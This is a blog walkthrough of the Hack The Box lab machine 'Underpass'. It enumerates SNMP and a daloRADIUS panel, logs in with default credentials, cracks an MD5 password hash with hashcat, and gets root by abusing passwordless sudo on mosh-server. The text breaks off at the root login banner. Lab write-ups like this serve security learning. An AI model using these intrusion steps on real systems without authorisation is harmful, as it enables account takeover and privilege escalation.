<!DOCTYPE html>
<html lang="en">

  <!-- Head -->
  <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">    <!-- Metadata, OpenGraph and Schema.org -->
    

    <!-- Standard metadata -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Underpass | Will  Lindsey</title>
    <meta name="author" content="Will  Lindsey">
    <meta name="description" content="A walkthrough of HackTheBox's Underpass">
    <meta name="keywords" content="blog">


    <!-- Bootstrap & MDB -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha256-DF7Zhf293AJxJNTmh5zhoYYIMs2oXitRfBjY+9L//AY=" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous">

    <!-- Fonts & Icons -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/academicons@1.9.1/css/academicons.min.css" integrity="sha256-i1+4qU2G2860dGGIOJscdC30s9beBXjFfzjWLjBRsBg=" crossorigin="anonymous">
    <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons">

    <!-- Code Syntax Highlighting -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jwarby/jekyll-pygments-themes@master/github.css" media="" id="highlight_theme_light">

    <!-- Styles -->
    
    <link rel="shortcut icon" href="data:image/svg+xml,&lt;svg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20100%20100%22&gt;&lt;text%20y=%22.9em%22%20font-size=%2290%22&gt;%F0%9F%92%BB&lt;/text&gt;&lt;/svg&gt;">
    
    <link rel="stylesheet" href="/assets/css/main.css">
    <link rel="canonical" href="https://blog.anotherplacein.com/blog/2025/underpass/">
    
    <!-- Dark Mode -->
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jwarby/jekyll-pygments-themes@master/native.css" media="none" id="highlight_theme_dark">

    <script src="/assets/js/theme.js"></script>
    <script src="/assets/js/dark_mode.js"></script>
    

  </head>

  <!-- Body -->
  <body class="fixed-top-nav ">

    <!-- Header -->
    <header>

      <!-- Nav Bar -->
      <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top">
        <div class="container">
          <a class="navbar-brand title font-weight-lighter" href="/"><span class="font-weight-bold">Will </span>Lindsey</a>
          <!-- Navbar Toggle -->
          <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar top-bar"></span>
            <span class="icon-bar middle-bar"></span>
            <span class="icon-bar bottom-bar"></span>
          </button>

          <div class="collapse navbar-collapse text-right" id="navbarNav">
            <ul class="navbar-nav ml-auto flex-nowrap">

              <!-- About -->
              <li class="nav-item ">
                <a class="nav-link" href="/">about</a>
              </li>
              
              <!-- Blog -->
              <li class="nav-item active">
                <a class="nav-link" href="/blog/">blog<span class="sr-only">(current)</span></a>
              </li>

              <!-- Other pages -->

              <!-- Toogle theme mode -->
              <li class="toggle-container">
                <button id="light-toggle" title="Change theme">
                  <i class="fas fa-moon"></i>
                  <i class="fas fa-sun"></i>
                </button>
              </li>
            </ul>
          </div>
        </div>
      </nav>

      <!-- Scrolling Progress Bar -->
      <progress id="progress" value="0">
        <div class="progress-container">
          <span class="progress-bar"></span>
        </div>
      </progress>
    </header>


    <!-- Content -->
    <div class="container mt-5">
      <!-- _layouts/post.html -->

<div class="post">

  <header class="post-header">
    <h1 class="post-title">Underpass</h1>
    <p class="post-meta">June 14, 2025</p>
    <p class="post-tags">
      <a href="/blog/2025"> <i class="fas fa-calendar fa-sm"></i> 2025 </a>
        ·  
        <a href="/blog/tag/hack-the-box">
          <i class="fas fa-hashtag fa-sm"></i> hack-the-box</a>  
          <a href="/blog/tag/easy">
          <i class="fas fa-hashtag fa-sm"></i> easy</a>  
          
        ·  
        <a href="/blog/category/mosh">
          <i class="fas fa-tag fa-sm"></i> mosh</a>  
          

    </p>
  </header>

  <article class="post-content">
    <h1 id="underpass">Underpass</h1>
<p>The Underpass machine hosts a DaloRadius server with default credentials. Logging in reveals a username and a hashed password, which can be cracked to gain SSH access. Once on the machine, the user can launch a Mosh server as root and connect to it, ultimately gaining full root access.</p>

<h2 id="nmap-scan">nmap scan</h2>
<p>First I run a basic nmap scan.  This gives me a little time to manually enumerate common ports while the nmap scan that enumerates all ports and services versions runs.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span><span class="nb">echo </span>10.10.11.48 <span class="o">&gt;</span> ip
<span class="go">
┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span><span class="nb">echo </span>underpass <span class="o">&gt;</span> box
<span class="go">
┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span><span class="nb">mkdir </span>nmap
<span class="go">
┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span><span class="nb">sudo </span>nmap <span class="si">$(</span><span class="nb">cat </span>ip<span class="si">)</span> |tee nmap/<span class="si">$(</span><span class="nb">cat </span>box<span class="si">)</span>_basic_namp.txt
<span class="go">[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-11 21:21 EDT
Nmap scan report for 10.10.11.48
Host is up (0.081s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds
</span></code></pre></div></div>
<p>I run a nmap scan on all TCP ports and set flags <code class="language-plaintext highlighter-rouge">-sC</code> and <code class="language-plaintext highlighter-rouge">-sV</code> to enumerate services/versions and run default scripts.  This scan shows Apache 2.4.52 running on the server and appears to be hosting some default content.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span><span class="nb">sudo </span>nmap <span class="nt">-p-</span> <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> nmap/<span class="si">$(</span><span class="nb">cat </span>box<span class="si">)</span>.all.tcp.ports <span class="si">$(</span><span class="nb">cat </span>ip<span class="si">)</span>
<span class="go">[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-13 15:36 EDT
Nmap scan report for 10.10.11.48
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
</span><span class="gp">22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
</span><span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
<span class="go">
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.17 seconds
</span></code></pre></div></div>
<h2 id="enumerating-port-80">Enumerating port 80</h2>
<h3 id="website_enum">website_enum</h3>
<p>I run a custom script to extract links and comments from the webpage, which reinforces the idea that this is a default Apache landing page.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>website_enum http://<span class="si">$(</span><span class="nb">cat </span>ip<span class="si">)</span>
<span class="go">~~~~~~~~Comments~~~~~~~~~~~~

    Modified from the Debian original for Ubuntu
    Last updated: 2022-03-22
    See: https://launchpad.net/bugs/1966004

~~~~~~END COMMENTS~~~~~~~~~~~
~~~~~~~~LINKS~~~~~~~~~~~~~~~~
https://bugs.launchpad.net/ubuntu/+source/apache2
/manual
http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
~~~~~~~~~ACTION BUTTONS~~~~~~
</span></code></pre></div></div>
<h3 id="inspect-in-browser">Inspect in Browser</h3>
<p>I navigate to <code class="language-plaintext highlighter-rouge">http://10.10.11.48</code> in my browser and find Apache2 Default Page for Ubuntu.</p>
<div class="text-center">
    <div class="img-fluid">
        <figure>

  <picture>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/underpass/1.png" class="img-fluid rounded z-depth-1" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture>

</figure>

    </div>
</div>

<h3 id="dirsearch">Dirsearch</h3>
<p>I run <code class="language-plaintext highlighter-rouge">dirsearch</code> against the site, but it does not find anything interesting.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>dirsearch <span class="nt">-u</span> http://<span class="si">$(</span><span class="nb">cat </span>ip<span class="si">)</span>
<span class="go">/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/htb/underpass/writeup/reports/http_10.10.11.48/_25-06-13_16-13-53.txt

Target: http://10.10.11.48/

[16:13:53] Starting:
[16:13:58] 403 -  276B  - /.ht_wsr.txt
[16:13:58] 403 -  276B  - /.htaccess.bak1
[16:13:58] 403 -  276B  - /.htaccess.orig
[16:13:58] 403 -  276B  - /.htaccess.save
[16:13:58] 403 -  276B  - /.htaccess.sample
[16:13:58] 403 -  276B  - /.htaccess_extra
[16:13:58] 403 -  276B  - /.htaccess_orig
[16:13:58] 403 -  276B  - /.htaccess_sc
[16:13:58] 403 -  276B  - /.htaccessBAK
[16:13:58] 403 -  276B  - /.htaccessOLD
[16:13:58] 403 -  276B  - /.htaccessOLD2
[16:13:58] 403 -  276B  - /.htm
[16:13:58] 403 -  276B  - /.html
[16:13:58] 403 -  276B  - /.htpasswd_test
[16:13:58] 403 -  276B  - /.httr-oauth
[16:13:58] 403 -  276B  - /.htpasswds
[16:14:00] 403 -  276B  - /.php
[16:14:34] 403 -  276B  - /server-status
[16:14:34] 403 -  276B  - /server-status/

Task Completed
</span></code></pre></div></div>
<h2 id="checking-snmp-udp-161">Checking SNMP udp 161</h2>

<h3 id="snmp-check">snmp-check</h3>
<p>At this stage, I haven’t performed a full UDP port scan yet. However, I decide to probe for SNMP manually using <code class="language-plaintext highlighter-rouge">snmp-check</code>. The scan reveals some valuable information: a potential hostname <code class="language-plaintext highlighter-rouge">underpass.htb</code>, a username <code class="language-plaintext highlighter-rouge">steve</code>, and a running service called <code class="language-plaintext highlighter-rouge">daloradius</code>.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>snmp-check <span class="si">$(</span><span class="nb">cat </span>ip<span class="si">)</span>
<span class="go">snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.48:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.11.48
  Hostname                      : UnDerPass.htb is the only daloradius server in the basin!
</span><span class="gp">  Description                   : Linux underpass 5.15.0-126-generic #</span>136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
<span class="go">  Contact                       : steve@underpass.htb
  Location                      : Nevada, U.S.A. but not Vegas
  Uptime snmp                   : 00:48:15.72
  Uptime system                 : 00:48:05.54
  System date                   : 2025-6-13 20:17:37.0

</span></code></pre></div></div>
<p>A full enumeration of the community string using <code class="language-plaintext highlighter-rouge">snmpwalk</code> doesn’t find any additional information that I found interesting.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>snmpwalk <span class="nt">-v2c</span> <span class="nt">-c</span> public <span class="si">$(</span><span class="nb">cat </span>ip<span class="si">)</span> <span class="nb">.</span> |tee snmp_walk_output.txt
<span class="gp">iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #</span>136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64<span class="s2">"
</span><span class="go">iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (361893) 1:00:18.93
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
</span><span class="gp">&lt;snip&gt;</span><span class="w">
</span></code></pre></div></div>
<p>I add <code class="language-plaintext highlighter-rouge">underpass.htb</code> to my <code class="language-plaintext highlighter-rouge">/etc/hosts</code></p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span><span class="nb">cat</span> /etc/hosts
<span class="go">127.0.0.1       localhost
127.0.1.1       kali

10.10.11.48     underpass.htb UnDerPass.htb


::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.170.175 resourcedc.resourced.local

</span></code></pre></div></div>
<h2 id="returning-to-enumerate-port-80">Returning to enumerate port 80</h2>
<h3 id="website_enum-1">website_enum</h3>
<p>With <code class="language-plaintext highlighter-rouge">website_enum</code> I determine <code class="language-plaintext highlighter-rouge">underpass.htb</code> is serving the same default apache content.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>website_enum http://underpass.htb
<span class="go">~~~~~~~~Comments~~~~~~~~~~~~

    Modified from the Debian original for Ubuntu
    Last updated: 2022-03-22
    See: https://launchpad.net/bugs/1966004

~~~~~~END COMMENTS~~~~~~~~~~~
~~~~~~~~LINKS~~~~~~~~~~~~~~~~
/manual
http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
https://bugs.launchpad.net/ubuntu/+source/apache2
~~~~~~~~~ACTION BUTTONS~~~~~~
</span></code></pre></div></div>
<h3 id="subdomain-enumeration">Subdomain enumeration</h3>
<p>I am unable to find a subdomain.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>wfuzz <span class="nt">-H</span> <span class="s1">'Host: FUZZ.underpass.htb'</span> <span class="nt">-u</span> <span class="s1">'http://underpass.htb'</span> <span class="nt">-w</span> /usr/share/seclists/Discovery/DNS/namelist.txt <span class="nt">--hh</span> 10671
<span class="go"> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://underpass.htb/
Total requests: 151265

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000036792:   400        10 L     35 W       301 Ch      "dns:monportail"
000061955:   400        10 L     35 W       301 Ch      "http://partner"
000061953:   400        10 L     35 W       301 Ch      "http://enquetes"
000061954:   400        10 L     35 W       301 Ch      "http://mobility"
000061966:   400        10 L     35 W       301 Ch      "https://archives"
000061970:   400        10 L     35 W       301 Ch      "https://ee"
000061978:   400        10 L     35 W       301 Ch      "https://partner"
000061983:   400        10 L     35 W       301 Ch      "https://www"
000061982:   400        10 L     35 W       301 Ch      "https://webpam"
000061980:   400        10 L     35 W       301 Ch      "https://scm"
000061981:   400        10 L     35 W       301 Ch      "https://sft"
000061977:   400        10 L     35 W       301 Ch      "https://pam"
000061979:   400        10 L     35 W       301 Ch      "https://protocoltraining"
000061976:   400        10 L     35 W       301 Ch      "https://nomade"
000061974:   400        10 L     35 W       301 Ch      "https://lvelizy"
000061975:   400        10 L     35 W       301 Ch      "https://mobility"
000061969:   400        10 L     35 W       301 Ch      "https://conseil"
000061972:   400        10 L     35 W       301 Ch      "https://idees"
000061973:   400        10 L     35 W       301 Ch      "https://igc"
000061968:   400        10 L     35 W       301 Ch      "https://collaboratif"
000061971:   400        10 L     35 W       301 Ch      "https://escale"
000061967:   400        10 L     35 W       301 Ch      "https://assurance"
000061965:   400        10 L     35 W       301 Ch      "https:"

Total time: 0
Processed Requests: 151265
Filtered Requests: 151242
Requests/sec.: 0
</span></code></pre></div></div>
<h3 id="what-is-daloradius">What is daloradius?</h3>
<p>At this point I was unable to find a valid subdomain, or any interesting paths.  Daloradius was mentioned in the SNMP enumeration.  Using google, I find a public <a href="https://github.com/lirantal/daloradius" rel="external nofollow noopener" target="_blank">daloradius</a> github repository.  I navigate to <code class="language-plaintext highlighter-rouge">http://underpass.htb/daloradius</code> and discover it is a valid path.</p>
<div class="text-center">
    <div class="img-fluid">
        <figure>

  <picture>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/underpass/2.png" class="img-fluid rounded z-depth-1" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture>

</figure>

    </div>
</div>
<p>With <code class="language-plaintext highlighter-rouge">curl</code> I am able to see the daloradius <code class="language-plaintext highlighter-rouge">README.md</code> file.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>curl http://underpass.htb/daloradius/README.md |head
<span class="go">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
</span><span class="gp">  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0&lt;p align="center"&gt;</span><span class="w">
</span><span class="gp">  &lt;img width="213" height="190" src="app/common/static/images/daloradius_logo.jpg"&gt;</span><span class="w">
</span><span class="gp">&lt;/p&gt;</span><span class="w">
</span><span class="go">
**daloRADIUS** is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with [OpenStreetMap](https://www.openstreetmap.org/copyright) for geolocation. The system is based on [FreeRADIUS](https://freeradius.org/) with which it shares access to the backend database.

</span><span class="gp">**daloRADIUS** is written using the [PHP programming language](https://www.php.net/) and uses a [database abstraction layer](https://en.wikipedia.org/wiki/Database_abstraction_layer) (DAL) for database access. Although DAL allows the use of different [database management systems](https://en.wikipedia.org/wiki/Database#</span>Database_management_system<span class="o">)</span> <span class="o">(</span>DBMSs<span class="o">)</span> <span class="o">(</span>e.g., MariaDB, MySQL, PostgreSQL, SQLite, MsSQL, etc.<span class="o">)</span>, <span class="k">**</span>it is important to note that daloRADIUS has been fully tested only on the <span class="o">[</span>MariaDB]<span class="o">(</span>https://mariadb.org/<span class="o">)</span> DBMS<span class="k">**</span><span class="nb">.</span> Therefore, <span class="k">**</span>the use of other DBMSs is not recommended<span class="k">**</span><span class="nb">.</span>
<span class="go">
</span><span class="gp">#</span><span class="c"># Installation</span>
<span class="gp">#</span><span class="c">## quick installation</span>
</code></pre></div></div>
<p>Using the github repository as a guide I was able to identify two login portals.<br>
Users Portal</p>
<div class="text-center">
    <div class="img-fluid">
        <figure>

  <picture>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/underpass/3.png" class="img-fluid rounded z-depth-1" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture>

</figure>

    </div>
</div>
<p>Operators Portal</p>
<div class="text-center">
    <div class="img-fluid">
        <figure>

  <picture>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/underpass/4.png" class="img-fluid rounded z-depth-1" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture>

</figure>

    </div>
</div>
<p>I search online for daloradius default creds and find <code class="language-plaintext highlighter-rouge">administrator:radius</code>.  These credentials work on the operators portal.</p>
<div class="text-center">
    <div class="img-fluid">
        <figure>

  <picture>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/underpass/5.png" class="img-fluid rounded z-depth-1" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture>

</figure>

    </div>
</div>
<p>I click <code class="language-plaintext highlighter-rouge">Go to users list</code> and find a username <code class="language-plaintext highlighter-rouge">svcMosh</code> and what appears to be an md5 hash <code class="language-plaintext highlighter-rouge">412DD4759978ACFCC81DEAB01B382403</code>.</p>
<div class="text-center">
    <div class="img-fluid">
        <figure>

  <picture>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/underpass/6.png" class="img-fluid rounded z-depth-1" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture>

</figure>

    </div>
</div>
<p>I use <code class="language-plaintext highlighter-rouge">hashcat</code> with MD5 mode to crack the hash.  The password is <code class="language-plaintext highlighter-rouge">underwaterfriends</code>.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>hashcat <span class="nt">-m</span> 0 hash.txt /usr/share/wordlists/rockyou.txt
<span class="go">hashcat (v6.2.6) starting

</span><span class="gp">OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #</span>1 <span class="o">[</span>The pocl project]
<span class="go">==================================================================================================================================================
</span><span class="gp">* Device #</span>1: cpu-sandybridge-Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i7-8750H CPU @ 2.20GHz, 2830/5724 MB <span class="o">(</span>1024 MB allocatable<span class="o">)</span>, 4MCU
<span class="go">
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

</span><span class="gp">Hashes: 1 digests;</span><span class="w"> </span>1 unique digests, 1 unique salts
<span class="go">Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

412dd4759978acfcc81deab01b382403:underwaterfriends

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 412dd4759978acfcc81deab01b382403
Time.Started.....: Sat Jun 14 17:38:11 2025 (2 secs)
Time.Estimated...: Sat Jun 14 17:38:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
</span><span class="gp">Speed.#</span>1.........:  1689.8 kH/s <span class="o">(</span>0.19ms<span class="o">)</span> @ Accel:512 Loops:1 Thr:1 Vec:8
<span class="go">Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2985984/14344385 (20.82%)
Rejected.........: 0/2985984 (0.00%)
Restore.Point....: 2983936/14344385 (20.80%)
</span><span class="gp">Restore.Sub.#</span>1...: Salt:0 Amplifier:0-1 Iteration:0-1
<span class="go">Candidate.Engine.: Device Generator
</span><span class="gp">Candidates.#</span>1....: underwear63 -&gt; unc112886
<span class="gp">Hardware.Mon.#</span>1..: Util:  0%
<span class="go">
Started: Sat Jun 14 17:38:10 2025
Stopped: Sat Jun 14 17:38:15 2025
</span></code></pre></div></div>
<p>I am now able to login to ssh with the credentials <code class="language-plaintext highlighter-rouge">svcMosh:underwaterfriends</code>.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(kali㉿kali)-[~/htb/underpass/writeup]
</span><span class="gp">└─$</span><span class="w"> </span>ssh svcMosh@underpass.htb
<span class="go">svcMosh@underpass.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jun 14 09:41:53 PM UTC 2025

  System load:  0.0               Processes:             226
  Usage of /:   58.2% of 6.56GB   Users logged in:       0
  Memory usage: 11%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Jan 11 13:29:47 2025 from 10.10.14.62
</span><span class="gp">svcMosh@underpass:~$</span><span class="w">
</span></code></pre></div></div>
<p>The user <code class="language-plaintext highlighter-rouge">svcMosh</code> grants access to the user flag on the box.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">svcMosh@underpass:~$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-l</span>
<span class="go">total 4
-rw-r----- 1 root svcMosh 33 Jun 13 19:30 user.txt
</span><span class="gp">svcMosh@underpass:~$</span><span class="w"> </span><span class="nb">cat </span>user.txt |wc
<span class="go">      1       1      33
</span></code></pre></div></div>
<h2 id="root">Root</h2>
<p>The user <code class="language-plaintext highlighter-rouge">svcMosh</code> can execute <code class="language-plaintext highlighter-rouge">mosh-server</code> as root.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">svcMosh@underpass:~$</span><span class="w"> </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="go">Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
</span></code></pre></div></div>
<p>I did a little googling to get familiar with what <code class="language-plaintext highlighter-rouge">mosh-server</code> is.  In short it is the server side component of Mosh (Mobile Shell).  Mosh is a remote terminal application similar, but different from ssh.  I figure I’ll try to start the mosh server and then connect to the server.  I found this <a href="https://stackoverflow.com/questions/69884458/cant-connect-to-server-via-mosh" rel="external nofollow noopener" target="_blank">stackoverflow</a> question helpful figuring out how to start and connect to the server.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">svcMosh@underpass:~$</span><span class="w"> </span><span class="nb">sudo </span>mosh-server
<span class="go">

MOSH CONNECT 60001 JQJ+bacfXIVKqO8mTQeYMQ

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
</span><span class="gp">Copyright 2012 Keith Winstein &lt;mosh-devel@mit.edu&gt;</span><span class="w">
</span><span class="gp">License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;</span><span class="nb">.</span>
<span class="go">This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 6398]
</span><span class="gp">svcMosh@underpass:~$</span><span class="w"> </span><span class="nv">MOSH_KEY</span><span class="o">=</span>JQJ+bacfXIVKqO8mTQeYMQ mosh-client 127.0.0.1 60001
<span class="go">Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Jun 15 12:58:51 AM UTC 2025

  System load:  0.4               Processes:             227
  Usage of /:   59.4% of 6.56GB   Users logged in:       2
  Memory usage: 11%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

